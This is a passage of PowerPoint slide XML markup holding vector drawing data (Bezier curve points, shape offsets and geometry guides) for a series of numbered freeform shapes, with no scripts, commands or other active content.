                      <a:pt x="160" y="154"/>
                      <a:pt x="161" y="153"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="72"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="74"/>
                      <a:pt x="85" y="74"/>
                      <a:pt x="88" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="69"/>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4" y="72"/>
                      <a:pt x="91" y="75"/>
                      <a:pt x="87" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="79"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="83"/>
                      <a:pt x="76" y="82"/>
                      <a:pt x="73" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="65" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="71"/>
                      <a:pt x="65" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="73"/>
                      <a:pt x="64" y="75"/>
                      <a:pt x="63" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="79"/>
                      <a:pt x="61" y="81"/>
                      <a:pt x="60" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="86"/>
                      <a:pt x="57" y="89"/>
                      <a:pt x="57" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="94"/>
                      <a:pt x="58" y="96"/>
                      <a:pt x="58" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="99"/>
                      <a:pt x="57" y="100"/>
                      <a:pt x="56" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="105"/>
                      <a:pt x="52" y="109"/>
                      <a:pt x="50" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="117"/>
                      <a:pt x="46" y="122"/>
                      <a:pt x="46" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="130"/>
                      <a:pt x="46" y="133"/>
                      <a:pt x="46" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="138"/>
                      <a:pt x="45" y="139"/>
                      <a:pt x="45" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="142"/>
                      <a:pt x="44" y="142"/>
                      <a:pt x="43" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="141"/>
                      <a:pt x="41" y="140"/>
                      <a:pt x="40" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="134"/>
                      <a:pt x="37" y="130"/>
                      <a:pt x="38" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="124"/>
                      <a:pt x="38" y="123"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>
                      <a:pt x="37"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70" y="170"/>
                      <a:pt x="69" y="173"/>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8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="196"/>
                      <a:pt x="73" y="194"/>
                      <a:pt x="72" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="189"/>
                      <a:pt x="70" y="186"/>
                      <a:pt x="69" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="184"/>
                      <a:pt x="68" y="183"/>
                      <a:pt x="68" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="182"/>
                      <a:pt x="71" y="182"/>
                      <a:pt x="72" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="184"/>
                      <a:pt x="76" y="186"/>
                      <a:pt x="79" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="188"/>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3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="179"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="119" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="168"/>
                      <a:pt x="118" y="164"/>
                      <a:pt x="118" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="157"/>
                      <a:pt x="118" y="154"/>
                      <a:pt x="119" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="148"/>
                      <a:pt x="122" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="143"/>
                      <a:pt x="129" y="140"/>
                      <a:pt x="132" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="141" y="139"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="139"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="119"/>
                      <a:pt x="135" y="98"/>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5"/>
                      <a:pt x="124" y="108"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="103"/>
                      <a:pt x="121" y="99"/>
                      <a:pt x="117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="87"/>
                      <a:pt x="112" y="79"/>
                      <a:pt x="107"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1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="52"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="32"/>
                      <a:pt x="100" y="30"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="31"/>
                      <a:pt x="88" y="34"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="87" y="41"/>
                      <a:pt x="87" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="44"/>
                      <a:pt x="87" y="46"/>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7" y="33"/>
                      <a:pt x="66" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="40"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="51"/>
                      <a:pt x="67" y="52"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="69" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="49"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="65" y="43"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="40"/>
                      <a:pt x="75" y="42"/>
                      <a:pt x="75" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="46"/>
                      <a:pt x="74" y="48"/>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7"/>
                      <a:pt x="87" y="65"/>
                      <a:pt x="91" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="63"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97"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6"/>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231"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5762" y="3343"/>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232"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5774" y="3343"/>
                <a:ext cx="5" cy="2"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 4"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 3 w 4"/>
                  <a:gd name="T3" fmla="*/ 0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1"/>
                      <a:pt x="3" y="1"/>
                      <a:pt x="4" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="2"/>
                      <a:pt x="3" y="2"/>
                      <a:pt x="2"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233"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1951"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234"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2149"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235"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2299"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Freeform 236"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2446"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Freeform 237"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2643"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Freeform 238"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2792"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239"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2990" y="7"/>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240"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3140" y="7"/>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241"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3288"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Freeform 242"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="343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243"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3632"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Freeform 244"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3827" y="9"/>
                <a:ext cx="155"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245"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4228"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Freeform 246"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4425"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247"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4575"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Freeform 248"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4723"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249"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4920"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8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4"/>
                      <a:pt x="0" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="31"/>
                      <a:pt x="11" y="29"/>
                      <a:pt x="16" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="24"/>
                      <a:pt x="27" y="21"/>
                      <a:pt x="32" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="16"/>
                      <a:pt x="43" y="13"/>
                      <a:pt x="48"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Freeform 250"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5070" y="7"/>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2" y="46"/>
                      <a:pt x="18" y="48"/>
                      <a:pt x="14" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="52"/>
                      <a:pt x="4"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251"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="521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Freeform 252"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5414"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Freeform 253"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5609"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Freeform 254"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5806"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0"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255"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5943" y="13"/>
                <a:ext cx="188" cy="219"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 188 w 188"/>
                  <a:gd name="T1" fmla="*/ 68 h 219"/>
                  <a:gd name="T2" fmla="*/ 185 w 188"/>
                  <a:gd name="T3" fmla="*/ 85 h 219"/>
                  <a:gd name="T4" fmla="*/ 141 w 188"/>
                  <a:gd name="T5" fmla="*/ 85 h 219"/>
                  <a:gd name="T6" fmla="*/ 130 w 188"/>
                  <a:gd name="T7" fmla="*/ 135 h 219"/>
                  <a:gd name="T8" fmla="*/ 177 w 188"/>
                  <a:gd name="T9" fmla="*/ 135 h 219"/>
                  <a:gd name="T10" fmla="*/ 173 w 188"/>
                  <a:gd name="T11" fmla="*/ 153 h 219"/>
                  <a:gd name="T12" fmla="*/ 126 w 188"/>
                  <a:gd name="T13" fmla="*/ 153 h 219"/>
                  <a:gd name="T14" fmla="*/ 112 w 188"/>
                  <a:gd name="T15" fmla="*/ 219 h 219"/>
                  <a:gd name="T16" fmla="*/ 91 w 188"/>
                  <a:gd name="T17" fmla="*/ 219 h 219"/>
                  <a:gd name="T18" fmla="*/ 106 w 188"/>
                  <a:gd name="T19" fmla="*/ 153 h 219"/>
                  <a:gd name="T20" fmla="*/ 64 w 188"/>
                  <a:gd name="T21" fmla="*/ 153 h 219"/>
                  <a:gd name="T22" fmla="*/ 49 w 188"/>
                  <a:gd name="T23" fmla="*/ 219 h 219"/>
                  <a:gd name="T24" fmla="*/ 29 w 188"/>
                  <a:gd name="T25" fmla="*/ 219 h 219"/>
                  <a:gd name="T26" fmla="*/ 43 w 188"/>
                  <a:gd name="T27" fmla="*/ 153 h 219"/>
                  <a:gd name="T28" fmla="*/ 0 w 188"/>
                  <a:gd name="T29" fmla="*/ 153 h 219"/>
                  <a:gd name="T30" fmla="*/ 3 w 188"/>
                  <a:gd name="T31" fmla="*/ 135 h 219"/>
                  <a:gd name="T32" fmla="*/ 47 w 188"/>
                  <a:gd name="T33" fmla="*/ 135 h 219"/>
                  <a:gd name="T34" fmla="*/ 57 w 188"/>
                  <a:gd name="T35" fmla="*/ 85 h 219"/>
                  <a:gd name="T36" fmla="*/ 10 w 188"/>
                  <a:gd name="T37" fmla="*/ 85 h 219"/>
                  <a:gd name="T38" fmla="*/ 14 w 188"/>
                  <a:gd name="T39" fmla="*/ 68 h 219"/>
                  <a:gd name="T40" fmla="*/ 60 w 188"/>
                  <a:gd name="T41" fmla="*/ 68 h 219"/>
                  <a:gd name="T42" fmla="*/ 74 w 188"/>
                  <a:gd name="T43" fmla="*/ 0 h 219"/>
                  <a:gd name="T44" fmla="*/ 96 w 188"/>
                  <a:gd name="T45" fmla="*/ 0 h 219"/>
                  <a:gd name="T46" fmla="*/ 81 w 188"/>
                  <a:gd name="T47" fmla="*/ 68 h 219"/>
                  <a:gd name="T48" fmla="*/ 124 w 188"/>
                  <a:gd name="T49" fmla="*/ 68 h 219"/>
                  <a:gd name="T50" fmla="*/ 137 w 188"/>
                  <a:gd name="T51" fmla="*/ 0 h 219"/>
                  <a:gd name="T52" fmla="*/ 158 w 188"/>
                  <a:gd name="T53" fmla="*/ 0 h 219"/>
                  <a:gd name="T54" fmla="*/ 145 w 188"/>
                  <a:gd name="T55" fmla="*/ 68 h 219"/>
                  <a:gd name="T56" fmla="*/ 188 w 188"/>
                  <a:gd name="T57" fmla="*/ 68 h 219"/>
                  <a:gd name="T58" fmla="*/ 120 w 188"/>
                  <a:gd name="T59" fmla="*/ 85 h 219"/>
                  <a:gd name="T60" fmla="*/ 78 w 188"/>
                  <a:gd name="T61" fmla="*/ 85 h 219"/>
                  <a:gd name="T62" fmla="*/ 67 w 188"/>
                  <a:gd name="T63" fmla="*/ 135 h 219"/>
                  <a:gd name="T64" fmla="*/ 109 w 188"/>
                  <a:gd name="T65" fmla="*/ 135 h 219"/>
                  <a:gd name="T66" fmla="*/ 120 w 188"/>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9">
                    <a:moveTo>
                      <a:pt x="188" y="68"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="185" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="68"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="120" y="85"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="78" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12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Freeform 256"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6159" y="9"/>
                <a:ext cx="156" cy="247"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 128 w 128"/>
                  <a:gd name="T1" fmla="*/ 101 h 203"/>
                  <a:gd name="T2" fmla="*/ 123 w 128"/>
                  <a:gd name="T3" fmla="*/ 145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257"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6357"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Freeform 258"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6506" y="9"/>
                <a:ext cx="154" cy="247"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 127 w 127"/>
                  <a:gd name="T1" fmla="*/ 101 h 203"/>
                  <a:gd name="T2" fmla="*/ 123 w 127"/>
                  <a:gd name="T3" fmla="*/ 145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259"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6701" y="9"/>
                <a:ext cx="154" cy="247"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 127 w 127"/>
                  <a:gd name="T1" fmla="*/ 101 h 203"/>
                  <a:gd name="T2" fmla="*/ 123 w 127"/>
                  <a:gd name="T3" fmla="*/ 145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5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="157"/>
                      <a:pt x="116" y="168"/>
                      <a:pt x="110" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105"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Freeform 260"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6898"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261"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7045" y="9"/>
                <a:ext cx="156" cy="247"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 128 w 128"/>
                  <a:gd name="T1" fmla="*/ 101 h 203"/>
                  <a:gd name="T2" fmla="*/ 124 w 128"/>
                  <a:gd name="T3" fmla="*/ 145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5"/>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Freeform 262"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7244" y="7"/>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4"/>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263"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7392" y="9"/>
                <a:ext cx="156" cy="247"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 128 w 128"/>
                  <a:gd name="T1" fmla="*/ 101 h 203"/>
                  <a:gd name="T2" fmla="*/ 123 w 128"/>
                  <a:gd name="T3" fmla="*/ 145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5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="157"/>
                      <a:pt x="116" y="168"/>
                      <a:pt x="111" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="185"/>
                      <a:pt x="98" y="192"/>
                      <a:pt x="90" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="201"/>
                      <a:pt x="72" y="203"/>
                      <a:pt x="62" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="203"/>
                      <a:pt x="43" y="201"/>
                      <a:pt x="36" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="192"/>
                      <a:pt x="22" y="186"/>
                      <a:pt x="16" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="169"/>
                      <a:pt x="7" y="159"/>
                      <a:pt x="4" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="135"/>
                      <a:pt x="0" y="121"/>
                      <a:pt x="0" y="106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="89"/>
                      <a:pt x="2" y="73"/>
                      <a:pt x="4"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Freeform 264"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7589" y="7"/>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4"/>
